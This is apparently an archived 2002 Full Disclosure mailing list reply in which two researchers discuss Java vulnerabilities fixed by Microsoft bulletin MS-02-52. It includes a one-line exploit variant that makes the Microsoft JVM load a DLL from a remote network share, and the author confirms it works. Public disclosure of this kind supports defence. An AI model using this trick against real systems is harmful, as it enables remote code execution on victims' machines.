Full Disclosure mailing list archives
Technical information about the vulnerabilities fixed by MS-02-52
From: jouko () solutions fi (Jouko Pynnonen)
Date: Mon, 23 Sep 2002 18:41:15 +0300 (EEST)
On Mon, 23 Sep 2002, Georgi Guninski wrote:
Does new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000"); work?
Yes, seems to work, so there's another way to exploit this one. It requires that browsing internet shares works, which may limit the systems where it can be exploited. Although there were other Java vulnerabilities involving the use of shares, I never came to think about this way. MS may have thought of this, but of course they don't mention this kind of things during the "co-operation". -- Jouko Pynnonen Online Solutions Ltd Secure your Linux - jouko () solutions fi http://www.solutions.fi http://www.secmod.com
Current thread:
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)